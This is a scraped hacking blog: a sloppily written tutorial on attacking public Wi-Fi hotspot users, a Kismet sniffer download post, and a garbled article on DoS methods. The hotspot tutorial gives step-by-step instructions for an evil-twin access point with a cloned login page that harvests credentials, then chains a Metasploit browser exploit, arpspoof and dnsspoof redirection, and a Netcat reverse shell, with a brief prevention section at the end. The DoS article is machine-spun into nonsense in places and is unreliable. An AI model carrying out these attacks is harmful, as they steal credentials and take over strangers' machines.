</div><ul style="font-weight: bold; text-align: justify;"><li><span style="font-size: small;"><b><span style="font-weight: normal;">Keep an up 2 date & running firewall with an IDS/IPS capability,this protects ur pc from detecting ur network by from the probe requests.</span></b></span></li>
</ul><ul style="text-align: justify;"><li>Run a configured Anti-Virus & Anti-spyware u can protect urself from hacking, if ur not using any anti-virus & anti-spyware they break into ur system & install malware,<a href="http://freedownloaz.blogspot.com/2008/01/how-to-make-keylogger.html">keyloggers</a>,system monitors, <a href="http://freedownloaz.blogspot.com/2008/01/remote-hacking_6357.html">remote hacking</a>) & if u protections they ll detect these malware, <a href="http://freedownloaz.blogspot.com/2008/01/how-to-make-keylogger.html">keylogger</a>, <a href="http://freedownloaz.blogspot.com/2008/01/remote-hacking_6357.html">remote hacking</a> & so on...</li>
</ul><ul style="text-align: justify;"><li>Use security enforcement software- Components such as <a class="undefined" href="http://www.networkassociates.com/us/products/mcafee/mgmt_solutions/epo.htm" target="_blank">McAfee's EPO</a> & see dat all da security services which are running in ur pc from start up to shutdown always updated.</li>
</ul><ul style="text-align: justify;"><li>IF ur using Wi-Fi adapter disable it-enable wen u attemt to make a conection</li>
</ul><span style="font-weight: bold;"><br />
</span><br />
<div style="text-align: justify;"><div class="fecha_anio"><br />
</div><a href="http://www.blogger.com/post-edit.g?blogID=2254663475743620910&postID=1518225299049510444" name="7691586606021901339"></a> <br />
<h1 class="post-title entry-title"><a href="http://freedownloaz.blogspot.com/2008/02/wireless-hotspot-hacks.html">2.Wireless -Hotspot Hacks</a> </h1><span style="font-weight: bold;">Wireless Hoptspot Hacks, " Wireless Hacks" tell abt how 2 perform hotspot hacks?</span><span style="font-weight: bold;"> hacks/cracks/techniques dat u ll hopefully find 2 be "cool".</span><br />
<br />
<span style="font-weight: bold;">Hack:</span><br />
U might seen wilreless hotspots as they can seen anywhere, with T-Mobile,Concourse,Wayport & so on...As we know mobile user are quickly connected in public places.Some Hotspots are available for free or some require free subscription.IN public places these WI-Fi hotspot are the greater security risks which we find.<br />
<br />
<span style="font-weight: bold;">Stealing Wi-Fi Hotspot credentials:</span><br />
Once in Russia a hacker used to hack username & passwords of dial accounts & used to sell them in black market & the owner of stolen credentials had to pay high charges.With the adding of public WI-Fi locations, hte threat of stealing credentials have been increased & also stealing wireless subscription credentials.<br />
The easiest way to steal wireless subscription credentials is done by AP Phishing. Today's real & applicable method is that end-user determines dat a wireless access point is valid by recognizing the SSID and ascertaining if the site has the look and feel of the real public Wi-Fi hotspot login page.For the end-user both of these can be spoofed(u cannot create normal network connections) & u need not to carry wireless access point around for doing this. <br />
</div><div style="text-align: justify;"><span style="font-weight: bold;">Steps to perform this technique:</span> <br />
</div><div style="text-align: justify;"></div><ul style="text-align: justify;"><li>First of all u have to setup ur computer to look alike an actual acsess point broadcasting da appropriate SSID(T-Mobile, Wayport, etc.)</li>
</ul><div style="text-align: justify;"></div><ul style="text-align: justify;"><li>Now u have login page & ur PC ll display look alike original login page of provider whose signals u r broadcasting.</li>
</ul><div style="text-align: justify;">It is easy to make ur pc broadcast the SSID of ur Choice, so dat the user can connect to u instead of valid WI-Fi Hotspot SSID.The problem with dis method is sees dat dis is an Ad-Hoc network & they do not connect to it.Now we use Airsnarf by <a href="http://airsnarf.shmoo.com/" target="_blank">Schmoo Group</a> to make da signal as it is coming from an access point, we turn our pc into access point.<br />
</div><div style="text-align: justify;">Difficult part in using Airsnarf & other HostAp programs is to find a card which supports HostAP drivers.Generally we use Senao NL-2511CD PLUS EXT2 200mw PCMCIA Wi-Fi with a Rover Portable Laptop Mount 2.4GHz 5.5dBi Antenna, we can purchase them from <a href="http://www.wlanparts.com/" target="_blank">http://www.wlanparts.com/</a>. <br />
</div><div style="text-align: justify;">Airsnarf consists of a number of configurable files that control how it operates. <br />
</div><div style="text-align: justify;"></div><div style="text-align: justify;"><img alt="Active Image" height="94" src="http://www.ethicalhacker.net/images/stories/columns/hoffman/july06/1.jpg" width="273" /> <br />
</div><div style="text-align: justify;"></div><div style="text-align: justify;"><b>airsnarf.cfg file used to configure basic Airsnarf functionality</b> <br />
</div><div style="text-align: justify;"></div><div style="text-align: justify;"><img alt="Active Image" height="414" src="http://www.ethicalhacker.net/images/stories/columns/hoffman/july06/2.jpg" width="412" /> <br />
</div><div style="text-align: justify;"></div><div style="text-align: justify;"><b>airsnarf.cgi file</b> <br />
</div><div style="text-align: justify;"></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"></div><div style="text-align: justify;">With Airnsnarf configured with default settings, it will display a default login page that looks like the following: <br />
</div><div style="text-align: justify;"></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><img alt="Active Image" height="305" src="http://www.ethicalhacker.net/images/stories/columns/hoffman/july06/3.jpg" width="575" /><br />
This page takes username & password which is entered & place it in a file wer it can be read.<br />
</div><div style="text-align: justify;">For making dis attack work, we have modify this login page so dat it looks same as WI_Fi hotspot provider's login.Basic html skills are required, it is not so difficult to goto a T-Mobile, Wayport, STSN, Concourse or any other hotspot provider's site u have to copy & paste their graphics to make ur fake login page look real.<br />
</div><div style="text-align: justify;"><br />
After configuring Airsnarf & creating fake login page, we can launch the attack.Any public place like airport,coffee shop's, parks wer people uses their laptops it ll work.For launching dis attack we have to activate Airsnarf by typing ./airsnarf command. Below u can c wat is going to happen after launching ur attack.<br />
</div><div style="text-align: justify;"><img alt="Active Image" height="594" src="http://www.ethicalhacker.net/images/stories/columns/hoffman/july06/4.jpg" width="575" /> <br />
</div><div style="text-align: justify;"></div><div style="text-align: justify;"><b>Airsnarf being launched and waiting for a connection</b> <br />
</div><div style="text-align: justify;">Here we see an end-user attempts to connect to the hotspot ll c the SSID which was entered in<br />
airsnarf.cfg file & use der pc to connect to the network.After launching der browser, they r asked to enter their username & password.<br />
</div><div style="text-align: justify;"><img alt="Active Image" height="434" src="http://www.ethicalhacker.net/images/stories/columns/hoffman/july06/5.jpg" width="576" /> <br />
</div><div style="text-align: justify;"></div><div style="text-align: justify;"><b>Windows Zero Config showing the T-Mobile HotSpot being broadcast by Airsnarf</b> <br />
</div><div style="text-align: justify;"></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"></div><div style="text-align: justify;"><img alt="Active Image" height="256" src="http://www.ethicalhacker.net/images/stories/columns/hoffman/july06/6.jpg" width="576" /> <br />
</div><div style="text-align: justify;"></div><div style="text-align: justify;"><br />
<b>Fake Walled Garden/Login Page presented by Airsnarf</b> <br />
</div><div style="text-align: justify;">If the user enter his username & password & clicks on login button, his username & password has been sent to hackers & he can utilises it.Many of us keep same username & passwords for all accounts so dat we can remember,Now if da hackers gets ur username & password can access ur email's ur online banking & so on.....<br />
<br />
</div><div style="text-align: justify;"><img alt="Active Image" height="113" src="http://www.ethicalhacker.net/images/stories/columns/hoffman/july06/7.jpg" width="532" /><br />
<b>Example of credentials entered into Airsnarf AP Phishing Site and dumped to a file</b> <br />
</div><div style="text-align: justify;"></div><div style="text-align: justify;">U can also make variations for the aboce trick to change SSID's to "Free Public Wi-Fi",& at this point u can change login page as below.<br />
</div><div style="text-align: justify;"><img alt="Active Image" height="392" src="http://www.ethicalhacker.net/images/stories/columns/hoffman/july06/8.jpg" width="575" /> <br />
</div><div style="text-align: justify;">Many users ll fall for dis trick & u can access der accounts..<br />
<br />
Malicious Websites & Browser Exploits:<br />
Given the knowledge of the aforementioned exploits, a creative combination could be had. What if the walled garden/login page in the previous exploit actually contained code that would exploit a user's machine? That way an attacker could gain access to an end-user system just by that user attempting to connect to what they believe is a valid Wi-Fi hotspot. An exploit that could take advantage of this is Microsoft's relatively recent Create Text Range vulnerability. All a hacker would need to do is copy the malicious code into the login page and every person who connected to that hotspot could potentially be exploited. <br />
</div><div style="text-align: justify;"><img alt="Active Image" height="362" src="http://www.ethicalhacker.net/images/stories/columns/hoffman/july06/9.jpg" width="575" /> <br />
</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">Part of the actual code that could be inserted into a webpage to automatically download and run a malicious executable on the victim's machine just by that user viewing the webpage. <br />
</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">That would be "cool," but we're going to take it a step further. What if people who were currently connected to the hotspot were "forced" to view a malicious page, regardless of the URL they entered into their browser? That would be "cooler!" <br />
</div><div style="text-align: justify;"></div><div style="text-align: justify;">This hack contains the following steps: <br />
</div><div style="text-align: justify;"></div><ul style="text-align: justify;"><li>Creating a malicious webpage and serving-it-up on a laptop</li>
<li>Redirecting traffic at a Public Wi-Fi Hotspot to that malicious webpage running on the laptop</li>
<li>As the victim is redirected and the malicious page is viewed, a browser-based exploit is run which gives the hacker a live command shell (c:\) on the victim's machine</li>
</ul><div style="text-align: justify;"></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"></div><div style="text-align: justify;">So, the hacker goes to a Public Wi-Fi hotspot and connects to the network. He then launches Metasploit to create the malicious webpage and serve-it-up. <br />
</div><div style="text-align: justify;"><br />
<img alt="Active Image" height="357" src="http://www.ethicalhacker.net/images/stories/columns/hoffman/july06/10.jpg" width="576" /><br />
</div><div style="text-align: justify;"></div><div style="text-align: justify;"><b>Commands to use Microsoft's Create Text Range vulnerability and to select the option of creating a reverse shell back to the hacker once the exploit is executed</b> <br />
</div><div style="text-align: justify;"></div><div style="text-align: justify;"><img alt="Active Image" height="357" src="http://www.ethicalhacker.net/images/stories/columns/hoffman/july06/11.jpg" width="576" /> <br />
</div><div style="text-align: justify;"></div><div style="text-align: justify;"><b>The setting of various options for the exploit</b> <br />
</div><div style="text-align: justify;"></div><div style="text-align: justify;"><img alt="Active Image" height="357" src="http://www.ethicalhacker.net/images/stories/columns/hoffman/july06/12.jpg" width="576" /> <br />
</div><div style="text-align: justify;"></div><div style="text-align: justify;"><b>With all options set properly, the web page is served-up and ready to exploit the machine by running the "exploit" command</b> <br />
</div><div style="text-align: justify;"></div><div style="text-align: justify;">Now that there's a machine on the hotspot network running a malicious webpage, it's necessary to redirect traffic destined for the Internet to that website. <br />
</div><div style="text-align: justify;"></div><div style="text-align: justify;"><img alt="Active Image" height="357" src="http://www.ethicalhacker.net/images/stories/columns/hoffman/july06/13.jpg" width="576" /> <br />
</div><div style="text-align: justify;"></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"></div><div style="text-align: justify;">Run the arpspoof command to redirect traffic destined for the Internet to the malicious webpage. <br />
</div><div style="text-align: justify;"></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"></div><div style="text-align: justify;"><img alt="Active Image" height="357" src="http://www.ethicalhacker.net/images/stories/columns/hoffman/july06/14.jpg" width="576" /> <br />
</div><div style="text-align: justify;"></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"></div><div style="text-align: justify;">Running dnsspoof, you can see that a user attempted to go to foxnews.com but was redirected to the malicious webpage. <br />
</div><div style="text-align: justify;"></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"></div><div style="text-align: justify;"><img alt="Active Image" height="142" src="http://www.ethicalhacker.net/images/stories/columns/hoffman/july06/15.jpg" width="575" /> <br />
</div><div style="text-align: justify;"></div><div style="text-align: justify;">This is the page that contains the malicious content that will enable a hacker to connect to the victim machine via Netcat. This page appears regardless of the URL entered by the end-user. This page could look like and say anything. <br />
</div><div style="text-align: justify;"></div><div style="text-align: justify;"><img alt="Active Image" height="357" src="http://www.ethicalhacker.net/images/stories/columns/hoffman/july06/16.jpg" width="576" /> <br />
</div><div style="text-align: justify;"></div><div style="text-align: justify;">The hacker then launches Netcat. The C:\ is on the victim's machine which is real bad news for the victim. FYI - Windows XP Firewall and Symantec AV were running the entire time. <br />
</div><div style="text-align: justify;"></div><div style="text-align: justify;">If you didn't want to go to a public Wi-Fi hotspot and serve-up the webpage, you could just host the website somewhere and send out e-mails trying to convince people to go to the site. With Metasploit, for example, the payload doesn't have to be a reverse shell, you can have the malicious webpage download and execute a malicious file. Perhaps that malicious file would install a Trojan, Keylogger, or other Malware. <br />
</div><div style="text-align: justify;"></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"></div><div style="text-align: justify;"><img alt="Active Image" height="357" src="http://www.ethicalhacker.net/images/stories/columns/hoffman/july06/17.jpg" width="576" /> <br />
</div><div style="text-align: justify;"></div><div style="text-align: justify;">Examples of possible Metasploit Payloads for ie_createtextrange exploit. <br />
</div><div style="text-align: justify;"></div><div style="text-align: justify;"><br />
Now that we've seen the "cool" and illegal hacks, let's talk about the real purpose of this article - Prevention! <br />
</div><div style="text-align: justify;"></div><h1 style="font-weight: normal; text-align: justify;"><span style="font-size: 100%;">Preventing the Hacks:There are basically two things to combating the previous hacks:</span> </h1><div style="text-align: justify;"></div><ul style="text-align: justify;"><li>Taking measures to ensure a hotspot is valid</li>
</ul><div style="text-align: justify;"></div><ul style="text-align: justify;"><li>Protecting the machine against browser-based exploits</li>
</ul><div style="text-align: justify;"></div><div style="text-align: justify;"><b style="font-weight: normal;">Ensuring a Hotspot is Valid:</b><br />
Validating a hotspot is extremely difficult for an end-user to do. In fact, the only realistic method to do so is to use a wireless client designed to work with various hotspots that can use some sort of WISPr check to help ensure the Hotspot is what it says it is. I used T-Mobile in the above example in large part because they are one of the few providers that can utilize this type of functionality. In fact, the best solution I know for enterprises to protect against public hotspot AP Phishing for their mobile users is to use a client such as Fiberlink's e360. Using a client such as this provides two areas of protection: <br />
</div><div style="text-align: justify;"></div><ol style="text-align: justify;"><li>The hotspot signal itself can be validated</li>
<li>The end-user doesn't enter their credentials into a webpage which can be faked. They select a signal with the client and enter the credentials in that client.</li>
</ol><div style="text-align: justify;"></div><div style="text-align: justify;">Note that in the below graphic, a valid T-Mobile HotSpot is displayed as "Fiberlink Wireless Premium Powered by T-Mobile" as opposed to just "tmobile." That is because the client has determined that the particular hotspot in question is, in fact, a valid T-Mobile HotSpot. If it were not valid a valid hotspot, the SSID would simply be displayed as it is being broadcast. <br />
</div><div style="text-align: justify;"></div><div style="text-align: justify;"><img alt="Active Image" height="458" src="http://www.ethicalhacker.net/images/stories/columns/hoffman/july06/18.jpg" width="397" /> <br />
</div><div style="text-align: justify;"></div><div style="text-align: justify;">Client-based solution that helps mitigate risk by helping to validate a hotspot. <br />
</div><div style="text-align: justify;"></div><div style="text-align: justify;">As mentioned in the second point, the user enters their credentials into the client not into a web-based form. For many obvious reasons, this is significantly more secure. With this particular client, both the username and password are immediately encrypted with 256-bit AES. <br />
</div><div style="text-align: justify;"></div><div style="text-align: justify;"><img alt="Active Image" height="278" src="http://www.ethicalhacker.net/images/stories/columns/hoffman/july06/19.jpg" width="241" /> <br />
</div><div style="text-align: justify;"></div><div style="text-align: justify;">The entering of credentials into a client as opposed to an easily spoofed webpage. <br />
</div><div style="text-align: justify;"></div><div style="text-align: justify;"></div><div style="text-align: justify;"><b>Protecting the Machine Against Browser-based Exploits:</b><br />
As with many exploits, the key is to have the mobile device be protected at all times. To protect against these exploits, the mobile device needs to: <br />
</div><div style="text-align: justify;"></div><ul style="text-align: justify;"><li><span style="font-size: 100%;"><b style="font-weight: bold;"><i>Have the latest security patches installed.</i></b><span style="font-weight: bold;"> </span></span>This is increasingly difficult to do for corporations as laptops are spending less and less of their time connected to the corporate LAN. This is bad, since many corporations can only push patches to machines when they are on the LAN. Consequently, corporations need to employ solutions that can push patches down to mobile devices anytime they are connected to the Internet and without end-user interaction.</li>
<li><b><i>Be restricted from surfing the Internet or connecting wirelessly if they do not have the latest patches</i></b>. This makes sense. If you are not secure enough to surf the Internet or connect to wireless hotspots, because you do not have a necessary patch, you shouldn't be able to do so. In essence, you need to protect yourself from yourself. For corporations, they are beginning to look at functionality such as Cisco NAC to help with this. Unfortunately, Cisco NAC only quarantines on the LAN or Post-VPN. It won't analyze the security posture of the mobile device or quarantine it if it doesn't have the necessary patches until it is essentially too late. That's why corporations need to implement solutions that will quarantine and remediate devices while the device is mobile, not just when they are VPNing into the corporate network. The logic for assessing the security posture and for quarantining needs to be on the endpoint itself!</li>
<li>Employ a program to protect against Zero Day type of attacks such as a Personal Firewall with IPS capabilities. As an example, even if the above machine weren't patched, ISS' Proventia would protect a machine against the aforementioned browser exploit.</li>
</ul><div style="text-align: justify;"></div><h1 style="font-weight: normal; text-align: justify;"><span style="font-size: small;">conclusion: I hope you've seen how easy it is to trick and exploit users when they are in a wireless environment. I also hope that in seeing how these exploits actually take place and seeing how to help prevent them, you and your corporation are better protected.</span> </h1><div style="text-align: justify;"></div><div style="text-align: justify;"><span style="font-weight: bold;">Conclusion:</span><br />
I hope you've seen how easy it is to trick and exploit users when they are in a wireless environment. I also hope that in seeing how these exploits actually take place and seeing how to help prevent them, you and your corporation are better protected.<br />
</div>Special thanks to the Metasploit Project and Schmoo Group. The use of your tools in explaining how the exploits are performed and the work you have put into the development of these tools is invaluable and appreciated.<br />
<br />
<br />
<div class="fecha_anio">2008<br />
</div><a href="http://www.blogger.com/post-edit.g?blogID=2254663475743620910&postID=1518225299049510444" name="8035091245055350671"></a> <br />
<h1 class="post-title entry-title"><a href="http://freedownloaz.blogspot.com/2008/02/kismet-wireless-network-sniffer.html">3.Kismet Wireless Network Sniffer</a> </h1><br />
Free download kismet Wireless Network Sniffer, it is the latest hacking tool and the great thing about dis tool is this is wireless....I think many of u didn't heard about it..<br />
Lets talk about this tool !!<br />
kismet is one of the best wireless hacking tool.Kismat is 802.11 layer wireles network detecter,snifffer and intrusions detectionn system.It works with any wireless card which supports raw monitoring mode, it can also snifff 802.11b,802.11a and 802.11g trafficc<br />
It identifies network byy passivelly collectin & detectin standard named networkss, detectin hidden network...<br />
<b>Features</b><br />
<ul><li>Ethereall/Tcpdumpp compatible data logging </li>
<li>Airsnortt compatiblle week-iv packet logging </li>
<li>Networrk IP rangee detections </li>
<li>Builtt-in channell hopping and multi-card split channel hoppiing </li>
<li>Hiddenn network SSID delocking<br />
</li>
<li>Graphicall mappin of network </li>
<li>Client/Server architectture allows multiplle clientss to view a single </li>
<li>Kismet serves simultaneouslly </li>
<li>Manufacturers and modell identifications of accesss point and client </li>
<li>Detectiion of known defaullt accesss points configuration </li>
<li>Runtimee decodings of WEP's packet for known network </li>
<li>Named pipee o/p for integrations with other toolss, such as a layerr3 IDS's like Snortt </li>
<li>Multiplexing's of multiplle simultaneouss capturre source on a single Kismett instances </li>
<li>Distributted remotee drone sniffing's </li>
<li>XML o/p</li>
<li>Over 20 supported card types </li>
</ul>The latest version of Kismet Wireless Network Sniffer click <a href="http://www.kismetwireless.net/code/kismet-2007-10-R1.tar.gz">here</a> to get it..<br />
Plz do comment for ur requests & for the improvement for our site!!!♥<br />
<br />
<br />
<img border="0" src="http://img179.imageshack.us/img179/4504/nsaiengu8.png" /><div class="blogger-post-footer">http://hackernepal.blogspot.com/feeds/posts/default</div>hanghttp://www.blogger.com/profile/12012311240848972404noreply@blogger.com0tag:blogger.com,1999:blog-2254663475743620910.post-3513444618958799602009-10-17T06:13:00.000-07:002009-10-20T01:57:34.790-07:00attack method(5)<h3 class="post-title entry-title" style="text-align: justify;"><span class="Apple-style-span" style="color: #054697; font-family: Arial, Verdana, Tahoma; font-size: 16px; line-height: 18px;"><span><a href="http://www.blogger.com/goog_1256024514299"> </a><a href="http://www.blogger.com/goog_1256024514303">Seven </a><span class="IL_LINK_STYLE" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: scroll !important; background-color: transparent !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat !important; color: blue; cursor: pointer !important; display: inline !important; font-family: Arial, Verdana, Tahoma; font-size: 16px; font-style: normal; font-weight: bold; padding-bottom: 1px !important; position: static !important; text-decoration: underline;"><a href="http://www.blogger.com/goog_1256024514303">Common</a></span><a href="http://www.blogger.com/goog_1256024514299"> DoS Attack </a></span><span class="IL_SPAN">Methods</span></span></h3><h3 class="post-title entry-title" style="text-align: justify;"><span class="Apple-style-span" style="color: #343434; font-family: Arial, Verdana, Tahoma; font-size: 12px; font-weight: normal; line-height: 15px;"><span><span>Hackers have an armory of <span class="IL_SPAN">methods</span> to pass Denial of </span><span class="IL_SPAN">Service</span><span><span> (DoS) <span class="IL_SPAN">attacks</span><span>. The following seven sections emphasize the degree of the quandary faced by organizations trying to battle the DoS threat. TippingPoint provides solutions to battle these <span class="IL_SPAN">common</span> </span></span><span class="IL_LINK_STYLE" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: scroll !important; background-color: transparent !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat !important; color: blue; cursor: pointer !important; display: inline !important; font-family: Arial, Verdana, Tahoma; font-size: 12px; font-style: normal; font-weight: normal; padding-bottom: 1px !important; position: static !important; text-decoration: underline;">methods</span><span> of DDoS <span class="IL_SPAN">attacks</span>:</span></span></span><br />
<br />
<span>� <span class="IL_SPAN">Vulnerabilities</span></span><br />
� Zombie Staffing<br />
<span>� Attack <span class="IL_LINK_STYLE" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: scroll !important; background-color: transparent !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat !important; color: blue; cursor: pointer !important; display: inline !important; font-family: Arial, Verdana, Tahoma; font-size: 12px; font-style: normal; font-weight: normal; padding-bottom: 1px !important; position: static !important; text-decoration: underline;">Tools</span></span><br />
<span>� Bandwidth <span class="IL_SPAN">Attacks</span></span><br />
<span>� SYN <span class="IL_SPAN">Floods</span></span><br />
<span>� Established <span class="IL_LINK_STYLE" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: scroll !important; background-color: transparent !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat !important; color: blue; cursor: pointer !important; display: inline !important; font-family: Arial, Verdana, Tahoma; font-size: 12px; font-style: normal; font-weight: normal; padding-bottom: 1px !important; position: static !important; text-decoration: underline;">Connection</span><span> <span class="IL_LINK_STYLE" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: scroll !important; background-color: transparent !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat !important; color: blue; cursor: pointer !important; display: inline !important; font-family: Arial, Verdana, Tahoma; font-size: 12px; font-style: normal; font-weight: normal; padding-bottom: 1px !important; position: static !important; text-decoration: underline;">Floods</span></span></span><br />
<span>� Connections-Per-Second <span class="IL_SPAN">Floods</span></span><br />
<br />
<span>Method 1 � <span class="IL_LINK_STYLE" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: scroll !important; background-color: transparent !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat !important; color: blue; cursor: pointer !important; display: inline !important; font-family: Arial, Verdana, Tahoma; font-size: 12px; font-style: normal; font-weight: normal; padding-bottom: 1px !important; position: static !important; text-decoration: underline;">Vulnerabilities</span></span><br />
<br />
<span><span>Attackers can effort to collide a <span class="IL_SPAN">service</span> or fundamental </span><span class="IL_SPAN">operating system</span><span><span><span><span> in a <span class="IL_LINK_STYLE" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: scroll !important; background-color: transparent !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat !important; color: blue; cursor: pointer !important; display: inline !important; font-family: Arial, Verdana, Tahoma; font-size: 12px; font-style: normal; font-weight: normal; padding-bottom: 1px !important; position: static !important; text-decoration: underline;">straight line</span> through a </span><span class="IL_SPAN">network</span><span>. These <span class="IL_SPAN">attacks</span> immobilize services by exploiting </span></span><span class="IL_LINK_STYLE" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: scroll !important; background-color: transparent !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat !important; color: blue; cursor: pointer !important; display: inline !important; font-family: Arial, Verdana, Tahoma; font-size: 12px; font-style: normal; font-weight: normal; padding-bottom: 1px !important; position: static !important; text-decoration: underline;">shock absorber</span><span> spread out and other accomplishment dodge that exist in defenseless servers. Vulnerability <span class="IL_LINK_STYLE" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: scroll !important; background-color: transparent !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat !important; color: blue; cursor: pointer !important; display: inline !important; font-family: Arial, Verdana, Tahoma; font-size: 12px; font-style: normal; font-weight: normal; padding-bottom: 1px !important; position: static !important; text-decoration: underline;">attacks</span> do not want widespread resources or bandwidth to commit; attackers only need to know of the survival of a susceptibility to be able to develop it and cause widespread injure. Once an attacker has control of a vulnerable </span></span><span class="IL_LINK_STYLE" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: scroll !important; background-color: transparent !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat !important; color: blue; cursor: pointer !important; display: inline !important; font-family: Arial, Verdana, Tahoma; font-size: 12px; font-style: normal; font-weight: normal; padding-bottom: 1px !important; position: static !important; text-decoration: underline;">service</span>, request, or </span><span class="IL_LINK_STYLE" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: scroll !important; background-color: transparent !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat !important; color: blue; cursor: pointer !important; display: inline !important; font-family: Arial, Verdana, Tahoma; font-size: 12px; font-style: normal; font-weight: normal; padding-bottom: 1px !important; position: static !important; text-decoration: underline;">operating system</span><span>, they abuse the opening to immobilize systems and in the end crash an whole <span class="IL_LINK_STYLE" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: scroll !important; background-color: transparent !important; background-image: none !important; background-position: 0% 50%; background-repeat: repeat !important; color: blue; cursor: pointer !important; display: inline !important; font-family: Arial, Verdana, Tahoma; font-size: 12px; font-style: normal; font-weight: normal; padding-bottom: 1px !important; position: static !important; text-decoration: underline;">network</span> from within. </span></span><br />
<br />
Method 2 � Zombie Conscription<br />
<br />
<span>The same <span class="IL_SPAN">vulnerabilities</span><span> used to collide a server allow hackers to change vulnerable PCs into Distributed Denial of <span class="IL_SPAN">Service</span><span><span> zombies. Once the hacker develop the susceptibility to increase manage of the system, they plant a backdoor into the system for later use in commiting DDoS <span class="IL_SPAN">attacks</span>. The Trojan or similar disease provides a trail into the system. Once the attacker has the path, they tenuously control the </span><span class="IL_SPAN">network</span><span>, making the server a �Zombie� that waits for the given attack authority. Using these zombies, attackers can send a huge number of DoS and DDoS <span class="IL_SPAN">attacks</span> with secrecy. Viruses can also be used for Zombie conscription. For instance, the MyDoom bug was designed to convert PCs into Zombies that attacked SCO and Microsoft at a prearranged time programmed into the virus. Other viruses fit backdoors that let hackers to open coordinated <span class="IL_SPAN">attacks</span>, rising the sharing of the <span class="IL_SPAN">attacks</span> across networks around the sphere. The following figures detail how attackers make and begin these <span class="IL_SPAN">attacks</span> against a </span><span class="IL_SPAN">network</span>.</span></span></span><br />
<br />
<span>Method 3 � Attack <span class="IL_SPAN">Tools</span></span><br />
<span>Through zombie recruitment, hackers use secret communication channels to contact and manage their zombie military. They can choose from hundreds of off-the-shelf backdoor programs and tradition <span class="IL_SPAN">tools</span>from websites. These <span class="IL_SPAN">tools</span><span> and programs begin these <span class="IL_SPAN">attacks</span> to penetrate and control networks as zombie armies to pass additional <span class="IL_SPAN">attacks</span> from within. Once they have the zombie systems, they can use other </span><span class="IL_SPAN">tools</span> to send a solitary command to all zombies concurrently. In some cases, commands are carried in ICMP or UDP packets that can go around firewalls. In other cases, the zombie �phones home� by making a TCP link to the master. Once the relation is created, the master can manage the Zombie.</span><br />
<br />
<span>The <span class="IL_SPAN">tools</span> used to attack and control systems comprise:</span><br />
<br />
<span>� Tribe Flood <span class="IL_SPAN">Network</span><span> (TFN) � Spotlight on Smurf, UDP, SYN, and ICMP reverberation apply for <span class="IL_SPAN">floods</span>.</span></span><br />
<span>� Tribe Flood <span class="IL_SPAN">Network</span> 2000 (TFN2K) � The updated version of TFN.</span><br />
<span>� Trinoo � Focuses on UDP <span class="IL_SPAN">floods</span>. Sends UDP packets to chance purpose ports.</span><br />
The size is configurable.<br />
<span>� Stacheldraht � Software tool that focuses on TCP, ACK, TCP NULL, HAVOC, DNS <span class="IL_SPAN">floods</span>, and TCP packet <span class="IL_SPAN">floods</span> with random headers.</span><br />
<br />
<a href="http://www.blockdos.net/" style="color: #335689; text-decoration: none;">DDoS Protection</a><span><span> <span class="IL_SPAN">tools</span><span> are growing both in terms of covert channel completion and in DDoS flooding<span class="IL_SPAN">methods</span>. New </span><span class="IL_SPAN">tools</span> exploit random port numbers or work across IRC. Further, smarter <span class="IL_SPAN">tools</span> cleverly mask flooding packets as lawful </span><span class="IL_SPAN">service</span> requests and/or bring in a high degree of chance. These improvements make it more and more hard for a port-filtering device to divide attack packets from lawful traffic. </span><br />
<br />
<span>Method 4 � Bandwidth <span class="IL_SPAN">Attacks</span></span><br />
<span><span>When a DDoS attack is opened, it can often be detected as a important change in the arithmetical work of art of the <span class="IL_SPAN">network</span><span> transfer. For example, a typical system might consist of 80 percent TCP and a 20 percent mix of UDP and ICMP. A change in the arithmetical mix can be a signal of a new attack. For example, the Slammer maggot resulted in a rush of UDP packets, whereas the Welchi worm shaped a flood of ICMP packets. Such surges can be DDoS <span class="IL_SPAN">attacks</span> or so-called zero-day <span class="IL_SPAN">attacks</span> � <span class="IL_SPAN">attacks</span> that develop secret</span></span><span class="IL_SPAN">vulnerabilities</span>.</span><br />
<br />
Method 5 � SYN Flood<br />
<span><span><span>One of the majority <span class="IL_SPAN">common</span> types of DoS </span><span class="IL_SPAN">attacks</span> is the SYN Flood. This assault can be launched from one or more attacker equipment to put out of action access to a target server. The attack use the device used to found a TCP </span><span class="IL_SPAN">connection</span>. Every TCP link requires the conclusion of a three-way handclasp before it can pass data:</span><br />
<br />
